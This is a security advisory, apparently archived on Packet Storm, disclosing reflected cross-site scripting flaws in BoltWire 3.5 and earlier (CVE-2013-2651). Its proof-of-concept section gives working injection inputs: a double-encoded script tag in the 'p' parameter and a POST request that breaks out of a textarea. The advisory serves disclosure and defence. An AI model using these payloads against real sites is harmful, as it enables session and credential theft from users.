what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BoltWire 3.5 Cross Site Scripting

BoltWire 3.5 Cross Site Scripting
Posted Oct 9, 2013
Authored by Manuel Garcia Cardenas | Site isecauditors.com

BoltWire versions 3.5 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-2651
SHA-256 | 867b4ee582a95ee6f0520a36a920849d91e7188ae8a379ff7d0be0787ff1d938

BoltWire 3.5 Cross Site Scripting

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2013-010
- Original release date: March 20th, 2013
- Last revised: March 25th, 2013
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2013-2651
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5

II. BACKGROUND
-------------------------
BoltWire is an easy to use web development engine with surprizing
flexibility and power. It has

the various strengths of a wiki, cms, database, search engine, and more,
all rolled together into

a software system of ground-breaking design.

III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in BoltWire <=3.5 , that
allows the execution of

arbitrary HTML/script code to be executed in the context of the victim
user's browser.

The code injection is done through the parameter "p" and "content" in
the page index.php.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the double encoding of the "p" parameter.

Malicious Request ("p" parameter):

Not vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=<script>alert("XSS")</script>
Not Vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS

%22%29%3c%2fscript%3e
Vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS

%2522%2529%253c%252fscript%253e

Malicious Request ("content" parameter):

POST /bolt/field/index.php?p=action.create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7;
BOLTsession=bf1bcm8370oqt84lh8nvrdklb7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

target=example&content=</textarea><script>alert("XSS")</script>&submit=PREVIEW>

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can

leverage to steal sensitive information as user credentials, personal
data, etc.

VI. SYSTEMS AFFECTED
-------------------------
All Versions of BoltWire <= v3.5

VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of

transaction with them must be validated.

VIII. REFERENCES
-------------------------
http://www.boltwire.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Manuel García Cárdenas (mgarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
------------------------
March 20, 2013 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 20, 2013: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 25, 2013: Sent to Devel Team.
October 09, 2013: After some months without feedback, we do a
full-disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or

guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse

of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security,

penetration testing, security compliance implementation and assessing.
Our clients include some

of the largest companies in areas such as finance, telecommunications,
insurance, ITC, etc.
We are vendor independent provider with a deep expertise since 2001. Our
efforts in R&D include

vulnerability research, open security project collaboration and
whitepapers, presentations and

security events participation and promotion. For further information
regarding our security

services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close